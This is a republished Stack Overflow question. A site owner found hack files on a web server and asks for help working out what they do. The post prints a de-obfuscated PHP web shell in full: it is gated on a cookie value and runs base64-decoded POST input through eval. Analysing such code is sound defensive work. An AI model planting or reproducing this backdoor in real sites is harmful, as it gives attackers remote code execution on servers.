PHP hack files found - help decoding and identifying

Posted by akc on Stack Overflow See other posts from Stack Overflow or by akc
Published on 2012-04-09T05:26:02Z Indexed on 2012/04/09 5:29 UTC
Read the original article Hit count: 223

Filed under:
|

I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}

But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704

I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.

I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

Thanks!

© Stack Overflow or respective owner

Related posts about php

Related posts about hack